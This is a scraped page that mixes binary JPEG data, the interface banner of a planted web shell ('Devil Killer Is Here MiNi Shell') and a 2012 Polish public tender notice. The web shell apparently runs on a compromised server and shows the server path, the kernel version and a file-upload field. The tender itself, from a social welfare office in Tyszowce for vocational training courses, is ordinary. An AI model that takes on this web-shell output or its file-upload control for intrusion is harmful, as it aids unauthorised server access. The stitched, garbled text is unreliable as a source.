JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120717/155635-N-2012.html

<p class="kh_header"><b>Tyszowce: Realizacja usług szkoleniowych w ramach projektu systemowego
Droga do zmian</b><br>
<b>Numer ogłoszenia: 155635 - 2012; data zamieszczenia: 17.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. 3 Maja 10, 22-630 Tyszowce, woj. lubelskie, tel. 84 66 19 346, faks 84 66 19 346.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja usług szkoleniowych w ramach projektu systemowego
Droga do zmian.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie dziewięciu rodzajów kursów i szkoleń oraz doradztwa zawodowego dla uczestników projektu systemowego Droga do zmian w ramach aktywnej integracji, według podziału na następujące części zamówienia współfinansowanego z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej. CZĘŚĆ I Zadanie nr 1 Kurs prawa jazdy   kat. B osób 7, kat. C osób 3,  kat. D 1 osoba i kat. T 3 osoby w tym 1 z kat. B Łączna ilość osób dla wszystkich kategorii 14 osób. Godziny szkolenia powinny być zgodne z Rozporządzeniem Ministra Infrastruktury z dnia 27 października 2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorówDz. U. z 2005 r. Nr 217, poz. 1834 z późn. zm.Program szkolenia musi odpowiadać programowi szkolenia określonemu przez Rozporządzenie Ministra Infrastruktury z dnia 27 października 2005r. w spawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów Dz. U. z 2005r. nr 217, poz. 1834 z późn. zm.Celem szkolenia jest przygotowanie do egzaminu państwowego teoretycznego i praktycznego. 
Wykonawca zobowiązany jest do zorganizowania i opłacenia kosztu egzaminu państwowego.CZĘŚĆ  II Zadanie nr 2  Opiekun osoby starszej  celem kursu jest teoretyczne i praktyczne przygotowanie słuchaczy do  wykonywania  zawodu opiekuna  przez 4 osoby . Liczba godzin 152 godz.1.Kurs skierowany jest do 4 osób będących beneficjentami projektu systemowego Droga do zmian realizowanego w ramach POKL współfinansowanego przez EFS zamieszkujących na terenie Gminy Tyszowce. Osoby te mają wykształcenie podstawowe i ponadgimnazjalne.
Zadanie nr 3 Kucharz, celem kursu jest teoretyczne i praktyczne przygotowanie słuchaczy do  wykonywania zawodu kucharza  3 osoby 140 godzin 1.Kurs skierowany jest do 3 osób będących beneficjentami projektu systemowego Droga do zmian realizowanego w ramach POKL współfinansowanego przez EFS zamieszkujących na terenie Gminy Tyszowce. Osoby te mają wykształcenie ponadgimnazjalne.Zadanie nr 4: Fryzjer z egzaminem czeladniczym 2 osoby, 256 godzin 1.Kurs skierowany jest do 2 osób będących beneficjentami projektu systemowego Droga do zmian realizowanego w ramach POKL współfinansowanego przez EFS zamieszkujących na terenie Gminy Tyszowce. Osoby te mają wykształcenie gimnazjalne i ponadgimnazjalne.2.Szkolenie powinno zakończyć się egzaminem czeladniczym.Zadanie nr 5  Sprzedawca z obsługą kasy fiskalnej celem kursu jest teoretyczne i praktyczne przygotowanie słuchaczy do  wykonywania zawodu sprzedawcy, oraz obsługi kasy fiskalnej, obsługa klientów, wystawianie rachunków i faktur, obsługa kasy fiskalnej 1.Kurs skierowany jest do 5 osób będących beneficjentami projektu systemowego Droga do zmian realizowanego w ramach POKL współfinansowanego przez EFS zamieszkujących na terenie Gminy Tyszowce. Osoby te mają wykształcenie podstawowe, gimnazjalne i ponadgimnazjalne.2.Liczba godzin szkolenia 104 godz. w tym zajęcia teoretyczne 30 godzin i zajęcia praktyczne 74 godz.3.Szkolenie powinno zakończyć się egzaminem. CZĘŚĆ  III Celem szkolenia jest nabycie odpowiednich uprawnień do obsługi maszyn w danej klasie oraz praktyczna nauka eksploatacji maszyn w różnych warunkach terenowych, a także zdobycie wiedzy teoretycznej w zakresie dokumentacji technicznej, bezpieczeństwa i higieny pracy przy eksploatacji maszyn, technologii wykonywania robót ziemnych, zasad użytkowania i obsługi maszyn.Program szkolenia musi być zgodny z § 24 rozporządzenia Ministra Gospodarki z dnia 20 września 2001r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych Dz. U. z 2001 r. nr 118, poz. 1263 oraz programem szkolenia zatwierdzonym przez Instytut Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie. Po ukończeniu szkolenia Wykonawca zobowiązany jest wydać, uczestnikowi szkolenia, zaświadczenie lub inny dokument potwierdzający ukończenie szkolenia i uzyskanie kwalifikacji, oraz w przypadku uzyskania pozytywnego wyniku egzaminu na uprawnienia operatora, świadectwo i książeczkę operatora, zgodnie z § 26 ust. 1 rozporządzenia Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych Dz. U. z 2001 r. Nr 118, poz. 1263. Zadanie nr 6 Operator ładowarki teleskopowej 1 osoba, 50 godzin 1.Kurs skierowany jest do 1 osoby będącej beneficjentem projektu systemowego Droga do zmian realizowanego w ramach POKL współfinansowanego przez EFS zamieszkałej na terenie Gminy Tyszowce. Osoba ta ma wykształcenie gimnazjalne.2.Liczba godzin szkolenia 50 godz. w tym 15 zajęć teoretycznych i 35 zajęć praktycznych. 3.Wykonawca musi dysponować potencjałem technicznym, parkiem maszynowym wraz z placem manewrowym zgodnie z wytycznymi Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie. Zadanie nr 7: Operator wózków jezdniowych z napędem silnikowym 6 osób, 70 godzin 1.Kurs skierowany jest do 6 osób będących beneficjentami projektu systemowego Droga do zmian  realizowanego w ramach POKL współfinansowanego przez EFS zamieszkujących na terenie Gminy Tyszowce. Osoby te mają wykształcenie podstawowe, gimnazjalne i ponadgimnazjalne.2.Liczba godzin szkolenia: 70 godz. w tym 50 godzin teoretycznych i 20 godzin praktycznych
Zadanie nr 8 Operator koparko ładowarki klasa III wszystkie typy 1 osoba, 180 godzin 1.Kurs skierowany jest do 1 osoby będącej beneficjentem projektu systemowego Droga do zmian  realizowanego w ramach POKL współfinansowanego przez EFS zamieszkałej na terenie Gminy Tyszowce. Osoba ta ma wykształcenie ponadgimnazjalne.2.Liczba godzin szkolenia: 180 godz. w tym 120 godzin zajęć teoretycznych i 60 godzin zajęć praktycznych 3.Wykonawca musi dysponować potencjałem technicznym, parkiem maszynowym wraz z placem manewrowym zgodnie z wytycznymi Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie.
CZĘŚĆ IV-Zadanie nr 9 Doradztwo zawodowe 21 osób bezrobotnych, nieaktywnych zawodowo i rolników, 50 godzin, 1.Doradztwo zawodowe dla 21 osób bezrobotnych i rolników beneficjentów  projektu systemowego w ramach POKL Droga do zmian w następującym podziale Doradztwo zawodowe indywidualne  dla 21 osób po 2 godzinyosobę. Godzina zajęć to jedna godzina zegarowa. Zajęcia powinny odbywać się w dni powszednie. Wykonawca zobowiązany jest do przedstawienia Zamawiającemu harmonogramu spotkań nie później niż 5 dni roboczych przed pierwszym spotkaniem. Zajęcia powinny odbywać się na terenie miasta Tyszowce. Doradztwo zawodowe indywidualne powinno być poprzedzone doradztwem grupowym. Doradztwo indywidualne powinno być przeprowadzone w czasie jednego spotkania bez możliwości podziału.Doradztwo zawodowe grupowe dla 21 osób  8 godzin. Jedna godzina zajęć to jedna godzina zegarowa. Dopuszcza się wykonanie usługi w ciągu dwóch dni po 4 godziny dziennie lub osiem godzin w ciągu jednego dnia. Zajęcia powinny odbywać się w dni powszednie w godzinach od 9.00 do 15.00 w Tyszowcach lub w odległości 40 km od siedziby Zamawiającego wówczas w  koszcie doradztwa należy uwzględnić koszt dojazdu. POSTANOWIENIA  OGÓLNE DOTYCZĄCE WSZYSTKICH CZĘŚCI 1. W trakcie trwania szkolenia konieczne jest zapewnienie warunków szkolenia zgodnych z przepisami bezpieczeństwa i higieny pracy.2.W przedmiocie zamówienia wymieniona jest minimalna wymagana liczba godzin.3.Wykonawca zobowiązany jest do przeprowadzenia szkolenia na terenie miasta Tyszowce, lub w odległości do 40 km. a w przypadku organizacji szkolenia poza Tyszowcami, pokrycia kosztów dojazdu uczestników szkolenia do miejsca szkolenia i z powrotem, przygotowania programu szkolenia, pokrycia kosztów przeprowadzenia egzaminów,przeprowadzenia szkolenia zgodnie z przedstawionym programem szkolenia, przeprowadzenia szkolenia zgodnie z harmonogramem w którym dzienna liczba godzin zajęć nie przekroczy 8 godz. zegarowych,przeprowadzenia szkolenia w dni powszednie z wyłączeniem świąt, zapewnienia każdego dnia szkolenia osobom skierowanym na szkolenie, serwisu kawowego nie dotyczy części  nr 1 i 3, ubezpieczenia od następstw nieszczęśliwych wypadków uczestników szkolenia wskazanych przez Zamawiającego i przesłanie do siedziby Zamawiającego oryginału polisy ubezpieczeniowej lub kserokopii potwierdzonej za zgodność z oryginałem, zapewnienia na własność osobom skierowanym na szkolenie materiałów dydaktycznych, oraz  zapewnienia uczestnikom szkolenia wyposażenia w postaci zeszytu notatnika oraz długopisu zawierających logo Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego i logo PO KL oraz formułę Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, wydania uczestnikom szkolenia, kończących je z wynikiem pozytywnym w terminie do 3 dni od daty zakończenia szkolenia, zaświadczenia zawierającego numer z rejestru,imię  i nazwisko oraz numer PESEL uczestnika szkolenia,a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie,formę i nazwę szkolenia,okres trwania szkolenia,miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji,tematy i wymiar godzin zajęć edukacyjnych,podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie,oraz innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, jeżeli wynika to z odrębnych przepisów zawierającego  logo Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego i logo PO KL oraz formułę Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.41.12.00-0, 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części  nr 1 Za spełnienie powyższego warunku Zamawiający uzna posiadanie przez Wykonawcę aktualnego wpisu do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców w rozumieniu art. 103 ustawy Prawo o ruchu drogowym j.t. Dz. U. z 2005 r. Nr 108 poz.908 z późn. zm. ocena tego warunku nastąpi na podstawie złożonego w tym zakresie oświadczenia załącznik nr 4 do SIWZ. Dla części  nr 2, 4
Wpis do rejestru instytucji szkoleniowych uprawnionych do prowadzenia szkoleń dla osób bezrobotnych zgodnie z art. 20 ust 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy tekst jednolity Dz. U. z 2008 r, Nr 69, poz. 415 z późn. zm. prowadzony przez właściwy miejscowo Wojewódzki Urząd Pracy, aktualizowany zgodnie z przepisami w celu potwierdzenia spełnienia tego warunku należy dołączyć oświadczenie o spełnianiu warunków udziału w postępowaniu załącznik nr 4 do SIWZ. Dla części nr 3 Wpis do rejestru instytucji szkoleniowych uprawnionych do prowadzenia szkoleń dla osób bezrobotnych zgodnie z art. 20 ust 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy tekst jednolity Dz. U. z 2008 r., Nr 69, poz. 415 z późn. zm. prowadzony przez właściwy miejscowo Wojewódzki Urząd Pracy, aktualizowany zgodnie z przepisami w celu potwierdzenia spełnienia tego warunku należy dołączyć oświadczenie o spełnianiu warunków udziału w postępowaniu załącznik nr 4 do SIWZ
Posiadanie potwierdzenia Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie spełnienia wymagań, o którym mowa w § 26 ust. 3 rozporządzenia Ministra Gospodarki z dnia 20 września 2001 roku Dz. U Nr 118 poz. 1263  w celu potwierdzenia spełnienia tego warunku należy dołączyć oświadczenie o spełnianiu warunków udziału w postępowaniu załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części nr 1
Za spełnienie powyższego warunku Zamawiający uzna wykonanie z należytą starannością w okresie trzech ostatnich lat a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, przed dniem wszczęcia postępowania, co najmniej dwóch usług odpowiadających swoim rodzajem przedmiotowi niniejszego zamówienia przez co zamawiający rozumie zorganizowanie i przeprowadzenie kursu na prawo jazdy kat. B dla grupy osób dwa zamówienia: grupa min. 5 osobowa, z podaniem ich wartości, nazwy zleceniodawcy, terminu realizacji według wzoru stanowiącego załącznik nr 6 do SIWZ, wraz z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie opinie, referencje wystawione przez zamawiających.Dla części nr 2,3,4
Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawca wykonał w okresie ostatnich trzech lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresi co najmniej 3 usług szkoleniowych dla grupy co najmniej 3 osobowej o tematyce odpowiadającej przedmiotowi zamówienia  w poszczególnych częściach dotyczy każdej części zamówienia oddzielnie wykonane z należytą starannością z podaniem ich wartości, nazwy zleceniodawcy, terminu realizacji według wzoru stanowiącego załącznik nr 6 do SIWZ, wraz z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie opinie, referencje wystawione przez zamawiających. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, ze łącznie spełniają powyższy warunek.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części nr 1,2,4  zamawiający nie precyzuje warunków. W celu potwierdzenia spełnienia tego warunku należy dołączyć oświadczenie o spełnianiu warunków udziału w postępowaniu załącznik nr 4 do SIWZ. Dla części nr 3 Posiadanie przez Wykonawcę potwierdzenia spełnienia wymagań, o którym mowa w § 26 ust. 3 rozporządzenia Ministra Gospodarki z dnia 20 września 2001 r. w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych Dz. U. z 2001 r. Nr 118, poz. 1263. W celu potwierdzenia spełnienia tego warunku należy dołączyć oświadczenie o spełnianiu warunków udziału w postępowaniu załącznik nr 4 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla części nr 1 Za spełnienie powyższego warunku, zamawiający uzna dysponowanie wykwalifikowaną kadrą zawodową tj. osobami  instruktorami nauki jazdy, z minimum 2 letnim doświadczeniem, mającymi uczestniczyć w realizacji przedmiotu zamówienia w części dotyczącej przeprowadzenia zajęć praktycznych i teoretycznych, które to osoby muszą posiadać kwalifikacje zawodowe określone przepisami Rozporządzenia Ministra Infrastruktury z dnia 27 października 2005r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami instruktorów i egzaminatorów Dz. U. z 2005r. Nr 217 poz. 1834 z późn. zm.  ocena tego warunku nastąpi na podstawie złożonego w tym zakresie oświadczenia załącznik nr 4 do SIWZ. Dla części nr 2,3,4 Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawca dysponuje co najmniej 3 wykładowcami posiadającymi zdolność do wykonania zamówienia w obrębie każdego zadania z osobna: tj. posiadającymi doświadczenie w szkoleniach o podobnej tematyce  minimum 3 letnie .Należy dołączyć wykaz kadry dydaktycznej stanowiący załącznik nr  7 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla wszystkich części nr 1,2,3,4
Posiadanie opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 50000,00 zł.. Należy dołączyć kserokopię polisy lub inny dokument potwierdzający ubezpieczenie wykonawcy od odpowiedzialności cywilnej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
